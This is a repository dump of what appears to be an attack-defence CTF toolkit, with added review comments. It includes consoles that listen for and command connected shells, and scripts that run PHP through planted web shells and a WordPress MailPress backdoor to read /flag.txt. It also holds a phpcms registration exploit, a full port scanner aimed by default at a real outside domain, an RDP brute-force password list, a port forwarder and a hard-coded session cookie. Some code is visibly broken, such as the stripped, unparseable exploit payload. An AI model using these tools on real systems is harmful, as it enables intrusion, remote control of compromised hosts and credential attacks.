98 | /var/www/mgr/logs/error_log
99 | /www/logs/proftpd.system.log
100 |
--------------------------------------------------------------------------------
/awd/shell_manager.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 |
4 | import SocketServer
5 | import threading
6 | import socket
7 |
8 | HOST = '0.0.0.0'
9 | PORT = 9999
10 | BUFSIZE = 1024 * 4
11 |
12 | CLIENTS = []
13 |
14 |
class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler):
    """One inbound connection to the console's listener.

    setup() records {client_ip: socket} in the module-level CLIENTS list;
    handle() receives a single chunk, prints it and returns.
    NOTE(review): handle() does not loop, so each connection ends after one
    recv(); the framework presumably closes the request socket afterwards,
    yet the entry (and its socket) stays in CLIENTS, where the console later
    calls sendall() on it.
    """

    def setup(self):
        # print(self.client_address)
        CLIENTS.append({self.client_address[0]: self.request})

    def handle(self):
        data = self.request.recv(BUFSIZE)
        cur_thread = threading.current_thread()    # unused
        # response = "{}: {}".format(cur_thread.name, data)
        print(data)
        print("\n")
        # self.request.sendall(response)

    def finish(self):
        print("finish\n")
        # print(self.client_address[0] + "\n")
32 |
33 |
class MyThreadingTCPServer(SocketServer.ThreadingTCPServer):
    """ThreadingTCPServer intended to have an enlarged listen backlog.

    NOTE(review): request_queue_size and socket_type are assigned *after* the
    base __init__ has already created, bound and listen()ed the socket, so
    these two assignments presumably have no effect on the live socket;
    defining them as class attributes would take effect.
    """

    def __init__(self, server_address, RequestHandlerClass):
        SocketServer.ThreadingTCPServer.__init__(
            self, server_address, RequestHandlerClass)
        self.request_queue_size = 200
        self.socket_type = socket.SOCK_STREAM
41 |
42 |
# Operator console.  Runs the listener on a daemon thread and reads commands
# from stdin:
#   ls        - number and print the recorded client entries
#   fuck <n>  - send typed lines to client n until "vquit"
#   exit      - shut the server down
#   eval ...  - evaluate the rest of the line as Python (operator's own input)
# NOTE(review): the listener binds HOST:PORT (0.0.0.0:9999) with no
# authentication, so any host that can reach the port is recorded as a client.
if __name__ == '__main__':
    server = MyThreadingTCPServer(
        (HOST, PORT), ThreadedTCPRequestHandler)
    try:
        st = threading.Thread(target=server.serve_forever)
        st.daemon = True
        st.start()
        print "Server loop running in thread:", st.name
        cmd = raw_input("cmd > ")
        while cmd:
            if cmd == 'ls':
                print("ls\n")
                for i in range(1, len(CLIENTS) + 1):
                    print("%d\t%s" % (i, CLIENTS[i - 1]))
            elif cmd[:4] == 'fuck':
                # NOTE(review): int() raises ValueError for "fuck" alone or a
                # non-numeric suffix, and cid == 0 prints the usage line but
                # then falls through to CLIENTS[-1].
                cid = int(cmd[4:])
                if not cid:
                    print("fuck [num]")
                if CLIENTS[cid - 1]:
                    print(CLIENTS[cid - 1])
                    # NOTE(review): each entry is a one-key dict {ip: socket},
                    # so indexing it with 1 raises KeyError; that lands in the
                    # broad except below and ends the console loop.
                    print("client %s >\n" % CLIENTS[cid - 1][1])
                    client = CLIENTS[cid - 1][CLIENTS[cid - 1].keys()[0]]
                    ccmd = raw_input("client > ")
                    while ccmd:
                        if ccmd == "vquit":
                            break
                        client.sendall(ccmd)
                        ccmd = raw_input("client > ")
            elif cmd == 'exit':
                server.shutdown()
                server.server_close()
                break
            elif cmd[:4] == 'eval':
                eval(cmd[4:])    # arbitrary code, from the console operator's own input
            else:
                print("Error cmd : %s" % cmd)
            cmd = raw_input("cmd > ")
    except KeyboardInterrupt:
        print("^C")
        server.shutdown()
        server.server_close()
    except Exception as e:
        print(e)
    # try:
    #     cmd = raw_input("cmd > ")
    #     while cmd:
    #         if cmd == 'ls':
    #             print("ls\n")
    #             for i in CLIENTS:
    #                 print("\t%s" % i)
    #         elif cmd == 'exit':
    #             print("exit\n")
    #             STOP = True
    #             sys.exit(0)
    #         else:
    #             print("Error cmd : %s" % cmd)
    #         cmd = raw_input("cmd > ")
    # except KeyboardInterrupt:
    #     sys.exit(0)
102 |
--------------------------------------------------------------------------------
/awd/fuck_pc.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding:utf-8
3 | import requests
4 | import re
5 | import time
6 |
req = None  # never read in this file

TOKEN = ""  # unused
# Scoreboard endpoint that captured flags are POSTed to (see submit()).
SUBMIT_URL = "http://192.168.80.1/lms/portal/sp/hz_flag.php"
SUBMIT_U = ""  # unused: submit() authenticates with a hard-coded Cookie header
SUBMIT_P = ""

# Target hosts; .104 is commented out in the original.
URLS = ['172.20.101.103',
        '172.20.102.103',
        '172.20.103.103',
        # '172.20.104.103',
        '172.20.105.103',
        '172.20.106.103',
        '172.20.107.103',
        '172.20.108.103'
        ]

# Planted shell URLs (phpcms upload dir), one per target.
# NOTE(review): the first two entries are identical (172.20.102.103) and there
# is no entry for 172.20.101.103 although it is in URLS — looks like a
# copy/paste slip; the host is sliced out of these URLs later, so the .102
# flag would be submitted twice and .101 never.
SHELLS = ["http://172.20.102.103/phpcms/uploadfile/2017/0520/20170520114246193.php",
          "http://172.20.102.103/phpcms/uploadfile/2017/0520/20170520114246193.php",
          "http://172.20.103.103/phpcms/uploadfile/2017/0520/20170520074437383.php",
          # "http://172.20.104.103/phpcms/uploadfile/2017/0520/20170520074438272.php",
          "http://172.20.105.103/phpcms/uploadfile/2017/0520/20170520114246624.php",
          "http://172.20.106.103/phpcms/uploadfile/2017/0520/20170520074438173.php",
          "http://172.20.107.103/phpcms/uploadfile/2017/0520/20170520114247898.php",
          "http://172.20.108.103/phpcms/uploadfile/2017/0520/20170520074438944.php"
          ]
33 |
34 |
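def poc_eval_backdoor_getflag_1(shellurl, p="virink",
                                code="echo file_get_contents('/flag.txt');"):
    """POST PHP ``code`` to an eval-style web shell and return the body.

    Generalised to match the three-argument variant in fuck_wp_1.py while
    keeping the old one-argument call working.

    Args:
        shellurl: URL of the planted shell.
        p: POST parameter name the shell evaluates (default ``virink``).
        code: PHP source to run (default reads ``/flag.txt``).

    Returns:
        ``res.content`` on HTTP 200, otherwise ``None``.  Network errors and
        the 5 s timeout propagate to the caller (the main loop catches them).
    """
    res = requests.post(shellurl, data={p: code}, timeout=5)
    if res.status_code == 200:
        print(res.content)
        return res.content
    return None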
43 |
44 |
def poc_phpcms_reg_shell(url):
    """Register a member on a phpcms site and pull a shell URL from the reply.

    ``url`` must already carry the scheme (the format string below has none;
    the fuck_wp_1.py variant prepends ``http://`` itself).

    The payload goes in ``info[content]``.  NOTE(review): in this listing the
    literal is empty and unterminated — the tag it contained was stripped on
    extraction — so the function as shown does not even parse.  Restore it
    from the original file; do not guess it.

    Returns the first ``<img src=...>`` value found in the response, or ''.
    This function is not called anywhere in this file.
    """
    u = '{}/index.php?m=member&c=index&a=register&siteid=1'.format(url)
    data = {
        'siteid': '1',
        'modelid': '1',
        'username': 'test',
        'password': 'testxx',
        'email': 'test@test.com',
        'info[content]': '
',
        'dosubmit': '1',
    }
    rep = requests.post(u, data=data)
    print(rep.content)
    shell = ''
    # Greedy: captures everything between "<img src=" and the last ">".
    re_result = re.findall(r'<img src=(.*)>', rep.content)
    if len(re_result):
        shell = re_result[0]
    return shell
63 |
64 |
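def submit(flag, ip, cookie=None):
    """POST a captured flag to the scoreboard and print the verdict.

    Args:
        flag: flag string (caller has already stripped CR/LF).
        ip: IP of the host the flag came from.
        cookie: value for the ``Cookie`` header.  Defaults to the session
            baked into this file.  NOTE(review): that is a live session
            credential committed to source — rotate it and pass your own.

    Prints the last 200 bytes of the reply plus a verdict line.  Network
    errors and the 5 s timeout propagate (the caller catches them).
    """
    if cookie is None:
        cookie = ("SSCSum=14; zlms-sid=uh8kbtd9jrki9ch4jo7qfnpnt0; "
                  "webcs_test_cookie=lms_cookie_checker; lms_login_name=HZ9; "
                  "PHPSESSID=jq11tlbp5kuvtk49h94r6b1ap2")
    headers = {"Cookie": cookie}
    data = {"melee_flag": flag, "melee_ip": ip}
    res = requests.post(SUBMIT_URL, data=data, headers=headers, timeout=5)
    if res.status_code != 200:
        return
    html = res.content
    print(html[-200:])
    # Scoreboard answers: "already submitted for this IP/flag" vs "correct".
    if '您已提交过当前IP和FLAG' in html:
        print('您已提交过当前IP和FLAG')
    elif '恭喜您答对了' in html:
        print('恭喜您答对了')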
82 |
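if __name__ == '__main__':
    # Single pass over the planted shells.  The original left a
    # `while True` / 10-minute sleep commented out for round-based play.
    for shell in SHELLS:
        print(shell)
        try:
            flag = poc_eval_backdoor_getflag_1(shell)
            if flag:
                print(flag)
                flag = flag.strip().replace('\r', '').replace('\n', '')
                # The original sliced shell[7:21], which only yields the host
                # because every address in SHELLS is exactly 14 characters.
                host = shell.split('/')[2]
                print("%s %s" % (host, flag))
                submit(flag, host)
                time.sleep(15)
        except Exception as e:
            print(e)
    print('Waiting...')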
100 |
--------------------------------------------------------------------------------
/tools/portscan3.py:
--------------------------------------------------------------------------------
1 | #!/user/bin python
2 | # -*- coding:utf-8 -*-
3 | # Author:Bing
4 | # Contact:amazing_bing@outlook.com
5 | # DateTime: 2017-01-17 19:06:06
6 | # Description: coding
7 |
8 | import sys
9 | sys.path.append("..")
10 |
11 | import threading
12 | import socket
13 | import sys
14 | import cmd
15 | import os
16 | import Queue
17 | from core.settings import *
18 |
# Serialises result-queue writes across ScanThread workers
# (Queue.Queue is itself thread-safe, so this is belt-and-braces).
lock = threading.Lock()
21 |
# Build the (host, port) work queue for the scanner threads
23 |
24 |
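def GetQueue(host):
    """Return a Queue of ``(host, port)`` pairs for every TCP port 1..65535.

    The original used ``range(1, 65535)``, which stops at 65534 and so never
    probed the last valid port.
    """
    PortQueue = Queue.Queue()
    for port in range(1, 65536):
        PortQueue.put((host, port))
    return PortQueue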
30 |
31 |
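class ScanThread(threading.Thread):
    """Worker: pops ``(host, port)`` pairs from ``SingleQueue`` and
    TCP-connects to each one.

    Open ports are pushed onto ``outip`` as ``(port/tcp, service_name)``.
    Threads are daemonic so the bounded ``join()`` in Work.run() never hangs.
    """

    def __init__(self, SingleQueue, outip):
        threading.Thread.__init__(self)
        self.daemon = True  # setDaemon() is the deprecated spelling
        self.SingleQueue = SingleQueue
        self.outip = outip

    def get_port_service(self, text):
        """Map ``<port>/tcp`` to a service name via the ';'-separated file
        ``dict_script_path + "nmap-services.txt"`` (core.settings).

        Returns ``(port/tcp, name)`` or ``(port/tcp, "unknown")``.  The file
        is re-read on every open port.  Lines without a ';' are skipped
        instead of raising IndexError.
        """
        service_path = dict_script_path + "nmap-services.txt"
        port_server = str(text) + "/tcp"
        with open(service_path, "r") as server:
            for finger in server:
                fields = finger.strip().split(";")
                if len(fields) < 2:
                    continue
                if fields[1] == port_server:
                    return (port_server, str(fields[0]))
        return (port_server, "unknown")

    def Ping(self, scanIP, Port):
        """Connect-scan one port; record it in ``outip`` if it is open.

        Returns True on a successful connect, False otherwise.  The 0.1 s
        timeout is aggressive: slow links will report open ports as closed.
        The original used a bare ``except:``, which also swallowed
        KeyboardInterrupt.
        """
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(0.1)
        try:
            sock.connect((scanIP, Port))
        except (socket.error, socket.timeout, OSError):
            return False
        finally:
            sock.close()
        with lock:
            self.outip.put(self.get_port_service(Port))
        return True

    def run(self):
        # get_nowait() instead of empty()+get(): with 200 workers the queue
        # can drain between the two calls and a blocking get() would then
        # hang that thread forever.
        while True:
            try:
                host, port = self.SingleQueue.get_nowait()
            except Queue.Empty:
                return
            self.Ping(host, port)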
73 |
74 |
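class Work(object):
    """One scan job: fan 200 ScanThreads over every port of ``scan_target``.

    ``run()`` builds ``{"status": 1, "data": [{"bug_name": "<port>/tcp",
    "bug_summary": "<service>"}, ...], "scan_id": ..., "scan_type": "nmap"}``,
    hands it to ``back_fn`` when one was given, and returns it.
    """

    def __init__(self, scan_id="", scan_target="", scan_type="", scan_args="", back_fn=None):
        self.scan_id = scan_id
        self.target = scan_target
        self.scan_type = scan_type  # not used by run()
        self.args = scan_args       # not used by run()
        self.back_fn = back_fn
        self.result = []

    def run(self):
        """Start the workers, wait briefly, then report whatever was found.

        NOTE(review): ``join(0.1)`` per thread bounds the wait to ~20 s in
        total and the workers are daemonic, so a scan still in progress is
        reported as-is (ports not yet probed look closed).  That behaviour
        is kept from the original; raise the join timeout for a full sweep.
        """
        SingleQueue = GetQueue(self.target)
        resultQueue = Queue.Queue()
        workers = [ScanThread(SingleQueue, resultQueue) for _ in range(200)]
        for t in workers:
            t.start()
        for t in workers:
            t.join(0.1)

        data = []
        while not resultQueue.empty():
            port, name = resultQueue.get()
            data.append({"bug_name": str(port), "bug_summary": str(name)})
        result = {"status": 1, "data": data,
                  "scan_id": self.scan_id, "scan_type": "nmap"}
        # The original called back_fn unconditionally and so raised
        # TypeError with the default back_fn=None.
        if self.back_fn is not None:
            self.back_fn(result)
        return result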
109 |
110 |
def save(nmap_result):
    """Default callback: dump the scan result followed by a dashed marker."""
    print("%s ----------------" % (nmap_result,))
113 |
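if __name__ == '__main__':
    # Target can be given on the command line; it falls back to the host the
    # original hard-coded.  A full 65535-port sweep of a third party is
    # noisy and very likely unauthorised — scan only what you own.
    target = sys.argv[1] if len(sys.argv) > 1 else "100tal.org"
    t = Work(scan_target=target, back_fn=save)
    t.run()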
117 |
--------------------------------------------------------------------------------
/awd/shellmanager.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 |
4 | import socket
5 | import sys
6 | import threading
7 | import time
8 | import random
9 |
HOST = '0.0.0.0'  # binds every interface: anyone who can reach PORT can connect
PORT = 23333
BUFSIZE = 1024 * 8

VER = sys.version_info.major

# Python 3 shim for the console prompts below.
if VER == 3:
    raw_input = input
18 |
19 |
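class Reader(threading.Thread):
    """Pump one connected client's output to stdout; forward commands to it.

    ``cmd()`` writes to the socket, ``stop()`` asks the thread to quit.
    """

    def __init__(self, client):
        threading.Thread.__init__(self)
        self.client = client
        # The original stored this flag in ``self.stop``, which shadowed the
        # stop() method and made ``reader.stop()`` raise TypeError.
        self._stopping = False

    def run(self):
        while not self._stopping:
            data = self.client.recv(BUFSIZE)
            if not data:
                # Peer closed.  The original treated the empty read as "no
                # data yet" and spun on recv() forever.
                break
            print(data)
            time.sleep(1)  # kept from the original (throttles console output)
        self.client.close()

    def cmd(self, cmd):
        """Send one command; str is encoded to bytes so Python 3 works."""
        if not isinstance(cmd, bytes):
            cmd = cmd.encode("utf-8")
        self.client.sendall(cmd)

    def stop(self):
        self._stopping = True
        # recv() blocks; shutting the socket down is what actually unblocks
        # run() so the flag gets seen.
        try:
            self.client.shutdown(socket.SHUT_RDWR)
        except (socket.error, OSError):
            pass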
40 |
# Unused: nothing in this file reads ``x``.  It only sketches the shape of
# Listener.clients ({host: {port: Reader}}) with a placeholder value.
x = {
    "127.0.0.1": {
        "port": "c"
    }
}
46 |
47 |
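class Listener(threading.Thread):
    """Accept loop: every connection gets a Reader, indexed by peer address.

    ``clients`` maps peer IP (str) -> {peer port (int) -> Reader}.
    """

    def __init__(self, port):
        threading.Thread.__init__(self)
        self.clients = {}
        # Renamed from ``self.stop``: that attribute shadowed the stop() method.
        self._stopping = False
        self.port = port
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((HOST, port))  # HOST is 0.0.0.0: reachable network-wide
        self.sock.listen(1)

    def run(self):
        print("listener started %s\n" % self.port)
        while not self._stopping:
            try:
                client, cltadd = self.sock.accept()
            except (socket.error, OSError):
                break  # listening socket closed by stop()
            t = Reader(client)
            c_host, c_port = client.getpeername()[:2]
            c_host = str(c_host)
            self.clients.setdefault(c_host, {})[c_port] = t
            t.start()

    def stop(self):
        """Stop every Reader and close the listening socket.

        The original did ``self.clients[i][1].stop()``, i.e. looked up
        port 1 in each host's dict, which raised KeyError.
        """
        for readers in self.clients.values():
            for reader in readers.values():
                reader.stop()
        self._stopping = True
        try:
            self.sock.close()
        except (socket.error, OSError):
            pass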
77 |
78 |
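def cmd(lst):
    """Operator console for a running Listener.

    Commands:
      ls               list clients as host -> port -> Reader
      fuck host:port   interactive loop sending lines to that client
                       (``vquit`` / ``vq`` returns to this prompt)
      exit             stop the listener and return
      eval <expr>      evaluate arbitrary Python — local operator convenience
                       only; never expose this prompt over the network

    Fixes against the original: the ``fuck`` branch looked clients up by the
    *string* port although Listener keys them by int, formatted it with %d,
    and then called ``sendall`` on the Reader (which only has ``cmd``) — so
    it failed every time; and on any exception the loop re-ran the same
    command forever because the prompt was never re-read.
    """
    cmd = raw_input("cmd > ")
    while True:
        try:
            if cmd == 'ls':
                for k_host in lst.clients:
                    print(">> %s\n" % (k_host))
                    for k_port in lst.clients[k_host]:
                        print(">>>> %s -> %s\n" % (k_port, lst.clients[k_host][k_port]))
            elif cmd[:4] == 'fuck':
                target = cmd[4:].strip()
                if ":" not in target:
                    print("fuck host:port")
                else:
                    host, port = target.rsplit(":", 1)
                    port = int(port)
                    reader = lst.clients[host][port]
                    pt = "client %s:%d >>" % (host, port)
                    ccmd = raw_input(pt)
                    while ccmd:
                        if ccmd == "vquit" or ccmd == "vq":
                            break
                        reader.cmd(ccmd + "\n")
                        ccmd = raw_input(pt)
            elif cmd == 'exit':
                lst.stop()
                break
            elif cmd[:4] == 'eval':
                eval(cmd[4:])
            else:
                print("cmd :\n\tls\n\tfuck host:port\n\texit")
        except Exception as e:
            print(e)
        cmd = raw_input("cmd > ")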
115 |
if __name__ == '__main__':
    # The accept loop runs as a daemon thread; the console owns the process.
    listener = Listener(PORT)
    listener.daemon = True
    listener.start()
    cmd(listener)
121 |
--------------------------------------------------------------------------------
/dict/password/3389爆破字典.txt:
--------------------------------------------------------------------------------
1 | 123456.com
2 | 123123
3 | idc123!@#
4 | 123
5 | aaa123!@#
6 | qq123.com
7 | 123456
8 | wantian##*(
9 | qwe123
10 | qwe1234
11 | 123qwe
12 | 123qwer
13 | 1qaz2wsx
14 | 1qaz
15 | 159753
16 | !Q@W#E
17 | 159357
18 | 147369
19 | 1234567
20 | password
21 | aistar123<>!N
22 | 321
23 | idcji2010
24 | qqqqqq
25 | 1q2w3e
26 | q1w2e3
27 | 336699
28 | abc123
29 | asd123
30 | 123654
31 | 1
32 | 111111
33 | 111
34 | 111qqq...
35 | 123456
36 | 953139.
37 | 0258
38 | 111qqq!!!
39 | 1236
40 | qqii
41 | tyinfo
42 | abcd36888
43 | rst_login
44 | OAOidc
45 | OAOidc123!@#
46 | OAOidc123
47 | esin888
48 | qwer
49 | power123
50 | power.liu
51 | power.yu
52 | dns99+588
53 | zhengui
54 | idc0.1
55 | 7715123
56 | sdwer
57 | power.zhao
58 | sdwer123
59 | qwer1234
60 | esincs
61 | jspower123.0
62 | 5656789
63 | 2323456
64 | power.com
65 | power123.0
66 | power0.123
67 | jspower.com
68 | 123123
69 | hlwj0519-1205.jf
70 | 123321
71 | zaxscdvf
72 | ..0
73 | !@#$QWER
74 | 95313
75 | 1231321
76 | 321123
77 | vipnew
78 | idc0514
79 | 1235698
80 | 235689
81 | 326598
82 | 112233
83 | 111222
84 | qqqqqq
85 | idc11
86 | 21vianet
87 | #@!ewq
88 | 1010
89 | 111qqq
90 | 1234%^&*
91 | 12345^&*()
92 | 123456
93 | 4867086
94 | 1234567
95 | 123!@#
96 | 123456!@#
97 | 10000
98 | 794613
99 | 784512
100 | 895623
101 | 789456
102 | 456123
103 | 654321
104 | 123!@#
105 | 1234!@#$
106 | 11185
107 | 12345!@#$%
108 | qwe123!@#
109 | !@#123
110 | !@#321
111 | 123#@!
112 | 19861212
113 | 19831212
114 | 19841020
115 | #@!123
116 | #@!321
117 | idcidc
118 | 12345^&*()
119 | !@#$%^&*()
120 | )(*&^%$#@!
121 | 0987654321
122 | tyidc
123 | 1122
124 | 111222
125 | idc123
126 | idcidcok
127 | idcuser
128 | abcd1234
129 | 1234abcd
130 | caonima
131 | 1q2w3e4r
132 | 888888
133 | admin!@#
134 | abc!@#
135 | !Q@W#E$R%T
136 | idc2010
137 | 1236
138 | 1q2w3e4r5t
139 | qqaazz
140 | asdasd
141 | admin
142 | admin1
143 | admin123
144 | aaa111
145 | 111aaa
146 | 123aaa
147 | lh222
148 | lhidc
149 | 123a
150 | a123
151 | 123456a
152 | a123456
153 | aaa123
154 | qazwsx
155 | qazxsw
156 | 0123
157 | 123112233
158 | 123111
159 | www.7x24.cn
160 | shisp.net
161 | 123000
162 | idc0123
163 | 1230..
164 | 123456789
165 | 123456qwe
166 | 123qwe
167 | 12345qwert
168 | zxcvbnm
169 | qwerty
170 | qweqwe
171 | q1w2e3
172 | 123ewq
173 | qwe321
174 | 1qazxsw2
175 | 12qwaszx
176 | 1234rewq
177 | 123456.com
178 | lituobestsanmao
179 | !@#19841010
180 | 19885510
181 | xyidc_2006
182 | 95217189
183 | 95217
184 | chinayixun
185 | huachen1258zz
186 | sanhe123
187 | 3H8IDC!!#
188 | 3H8IDC72sanhe000
189 | xiaoyili
190 | sanhe000~!@#
191 | 3H8IDC!!#
192 | ccfeng66131421
193 | !@#59560955
194 | tkggja850518`1
195 | zhengui
196 | anada325!@#
197 | www.txwscx.comsritgyxf2sxy19831122zx
198 | ZHONGGUO$#@!999@
199 | admin13906271234
200 | 395835961
201 | senlinyan
202 | 3203672
203 | 9527999!!!
204 | P@ssw0rd
205 | huaiyukeji115
206 | idc9aewr42
207 | idc0.1
208 | 123asdasd
209 | qsx6059410172.
210 | idc0001
211 | idc800888
212 | idc46121
213 | 123asdasd
214 | 882627.8
215 | luofei520!@#123
216 | 852799!!!
217 | idc0123.0
218 | 513tyml.com
219 | abc123!@#
220 | 1q2w3e,./? ><
221 | 6504710shuazuan
222 | 123.789+
223 | 123asdasd
224 | 752883855.
225 | senlinyan$
226 | admin001
227 | 6695zx
228 | scictd9821622
229 | 365obsserver!
230 | ranglm123456
231 | 13920225257
232 | idc925111
233 | 1qaz@wsx#edc
234 | .......199
235 | xu15817079919
236 | yanjin0429
237 | zhangznw
238 | 13527380230
239 | idc0.01
240 | idc123&123
241 | 662766
242 | 122.224
243 | huaiyukeji115
244 | .......199@
245 | liuzhangzi1988
246 | 123456!@#$%^
247 | idc0123
248 | dahouzi110
249 | 123.789+
250 | trista188#**
251 | mm1237
252 | 07736056123
253 | TnHoo15862380404
254 | idc0123
255 | 189532210113
256 | idc123
257 | gedingfeng1102888
--------------------------------------------------------------------------------
/awd/fuck_wp_1.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding:utf-8
3 | import requests
4 | import re
5 | import time
6 |
req = None  # module-level name is never read in this file

TOKEN = ""  # unused
# Scoreboard endpoint that captured flags are POSTed to (see submit()).
SUBMIT_URL = "http://192.168.80.1/lms/portal/sp/hz_flag.php"
SUBMIT_U = ""  # unused: submit() authenticates with a hard-coded Cookie header
SUBMIT_P = ""

# WordPress targets (used by fuck_1); .104 is commented out in the original.
URLS = ['172.20.101.101',
        '172.20.102.101',
        '172.20.103.101',
        # '172.20.104.101',
        '172.20.105.101',
        '172.20.106.101',
        '172.20.107.101',
        '172.20.108.101'
        ]
# phpcms targets; only referenced from commented-out code in __main__.
URLS2 = ['172.20.101.103',
         '172.20.102.103',
         '172.20.103.103',
         # '172.20.104.103',
         '172.20.105.103',
         '172.20.106.103',
         '172.20.107.103',
         '172.20.108.103'
         ]
32 |
33 |
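def poc_eval_backdoor_getflag_1(shellurl, p, code):
    """POST PHP ``code`` as parameter ``p`` to an eval-style web shell.

    Returns the response body on HTTP 200.  Returns ``None`` on any other
    status or when the request itself fails (the error is printed, not
    raised, so the per-host loop in fuck_1() keeps going).  Narrowed from
    ``except Exception`` (Python 2 comma syntax) to requests' own error
    class so programming errors are no longer hidden.
    """
    try:
        res = requests.post(shellurl, data={p: code}, timeout=5)
    except requests.RequestException as e:
        print(e)
        return None
    if res.status_code == 200:
        return res.content
    return None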
44 |
45 |
def poc_phpcms_reg_shell(url):
    """Register a member on ``http://<url>/phpcms`` and pull a shell URL
    from the reply.

    The payload goes in ``info[content]``.  NOTE(review): in this listing the
    literal is empty and unterminated — the tag it contained was stripped on
    extraction — so the function as shown does not even parse.  Restore it
    from the original file; do not guess it.

    Returns the first ``<img src=...>`` value found in the response, or ''.
    Only referenced from commented-out code in __main__.
    """
    u = 'http://{}/phpcms/index.php?m=member&c=index&a=register&siteid=1'.format(
        url)
    data = {
        'siteid': '1',
        'modelid': '1',
        'username': 'test',
        'password': 'testxx',
        'email': 'test@test.com',
        'info[content]': '
',
        'dosubmit': '1',
    }
    rep = requests.post(u, data=data)
    print(rep.content)
    shell = ''
    # Greedy: captures everything between "<img src=" and the last ">".
    re_result = re.findall(r'<img src=(.*)>', rep.content)
    if len(re_result):
        shell = re_result[0]
    print url, shell
    return shell
66 |
67 |
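def submit(flag, ip, cookie=None):
    """POST a captured flag to the scoreboard and print the verdict.

    Args:
        flag: flag string (caller has already stripped CR/LF).
        ip: IP of the host the flag came from.
        cookie: value for the ``Cookie`` header.  Defaults to the session
            baked into this file.  NOTE(review): that is a live session
            credential committed to source — rotate it and pass your own.

    Prints the last 200 bytes of the reply plus a verdict line.  Network
    errors and the 5 s timeout propagate (the caller catches them).
    """
    if cookie is None:
        cookie = ("SSCSum=14; zlms-sid=uh8kbtd9jrki9ch4jo7qfnpnt0; "
                  "webcs_test_cookie=lms_cookie_checker; lms_login_name=HZ9; "
                  "PHPSESSID=jq11tlbp5kuvtk49h94r6b1ap2")
    headers = {"Cookie": cookie}
    data = {"melee_flag": flag, "melee_ip": ip}
    res = requests.post(SUBMIT_URL, data=data, headers=headers, timeout=5)
    if res.status_code != 200:
        return
    html = res.content
    print(html[-200:])
    # Scoreboard answers: "already submitted for this IP/flag" vs "correct".
    if '您已提交过当前IP和FLAG' in html:
        print('您已提交过当前IP和FLAG')
    elif '恭喜您答对了' in html:
        print('恭喜您答对了')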
85 |
86 |
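def fuck_1():
    """Read /flag.txt through the MailPress ``uninstall.php`` backdoor on
    every host in URLS and submit each flag, sleeping 15 s per submission.

    ``"525"`` is the POST parameter name the planted shell expects.  Errors
    are printed per host and the loop continues.  The original also opened a
    ``requests.session()`` it never used; that is gone.
    """
    for ip in URLS:
        try:
            su = 'http://{}/wp-content/plugins/mailpress/uninstall.php'.format(ip)
            flag = poc_eval_backdoor_getflag_1(
                su, "525", "echo file_get_contents('/flag.txt');")
            if flag:
                flag = flag.strip().replace('\r', '').replace('\n', '')
                print("%s %s" % (ip, flag))
                submit(flag, ip)
                time.sleep(15)
        except Exception as e:
            print(e)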
102 |
103 |
def test():
    """Unfinished scratch variant of fuck_1().

    NOTE(review): ``custom_shell_add_shell`` is defined nowhere in this file
    and is not imported, so calling test() raises NameError on the first
    host.  Not called from __main__.
    """
    for ip in URLS:
        # su = 'http://{}/wp-content/plugins/mailpress/uninstall.php'.format(
        #     ip)
        custom_shell_add_shell(ip)
        # flag = poc_eval_backdoor_getflag_1(
        #     su, "525", "echo file_get_contents('/flag.txt');")
        print ip
112 |
113 |
if __name__ == '__main__':
    # One pass over URLS.  The author left two alternatives commented out:
    # a `while True` round loop with a 20-minute sleep, and planting phpcms
    # shells over URLS2 with poc_phpcms_reg_shell().
    fuck_1()
123 |
--------------------------------------------------------------------------------
/scripts/rtcp.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | '''
4 | filename:rtcp.py
5 | @desc:
6 | 利用python的socket端口转发,用于远程维护
7 | 如果连接不到远程,会sleep 36s,最多尝试200(即两小时)
8 |
9 | @usage:
10 | ./rtcp.py stream1 stream2
11 | stream为:l:port或c:host:port
12 | l:port表示监听指定的本地端口
13 | c:host:port表示监听远程指定的端口
14 |
15 | @author: watercloud, zd, knownsec team
16 | @web: www.knownsec.com, blog.knownsec.com
17 | @date: 2009-7
18 | '''
19 |
20 | import socket
21 | import sys
22 | import threading
23 | import time
24 |
streams = [None, None]  # the two endpoints to bridge: socket objects, or 'quit' once a side gives up
debug = 1  # 1 = trace every recv/sendall on stdout, 0 = quiet
27 |
def _usage():
    """Print the command-line synopsis."""
    print('Usage: ./rtcp.py stream1 stream2\nstream : l:port or c:host:port')
30 |
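def _get_another_stream(num):
    """Block until the *other* endpoint (``1 - num``) is set, and return it.

    Polls ``streams`` once a second.  If the other side has given up (its
    slot holds the string 'quit') the process exits with status 1.

    Raises:
        ValueError: ``num`` is not 0 or 1.  The original did
        ``raise "ERROR"`` — a string exception, which is itself a TypeError
        on every supported interpreter.
    """
    if num not in (0, 1):
        raise ValueError("stream number must be 0 or 1, got %r" % (num,))
    other = 1 - num
    while True:
        peer = streams[other]
        if peer == 'quit':
            print("can't connect to the target, quit now!")
            sys.exit(1)
        if peer is not None:
            return peer
        time.sleep(1)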
51 |
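def _xstream(num, s1, s2):
    """Copy bytes from ``s1`` to ``s2`` until either side fails, then close both.

    ``num`` only labels the debug output so the two directions can be told
    apart.  On exit both ``streams`` slots are reset to None so the
    listening side can pair up a fresh connection.
    """
    try:
        while True:
            # recv() blocks until data arrives or the peer fully closes;
            # shutdown() on the peer is the quickest way to unblock it.
            buff = s1.recv(1024)
            if debug > 0:
                print("%s recv" % (num,))
            if not buff:  # zero-length read: peer closed
                print("%s one closed" % (num,))
                break
            s2.sendall(buff)
            if debug > 0:
                print("%s sendall" % (num,))
    except Exception:
        # The original's bare ``except:`` also swallowed KeyboardInterrupt
        # and SystemExit.
        print("%s one connect closed." % (num,))

    # Shut down and close each socket independently: in the original a
    # failing shutdown() skipped the close() that followed it.
    for s in (s1, s2):
        try:
            s.shutdown(socket.SHUT_RDWR)
        except Exception:
            pass
        try:
            s.close()
        except Exception:
            pass

    streams[0] = None
    streams[1] = None
    print("%s CLOSED" % (num,))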
87 |
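def _server(port, num):
    """Listen on ``port`` and bridge each accepted connection, one at a time.

    Binds 0.0.0.0, so the forwarder is reachable from every interface —
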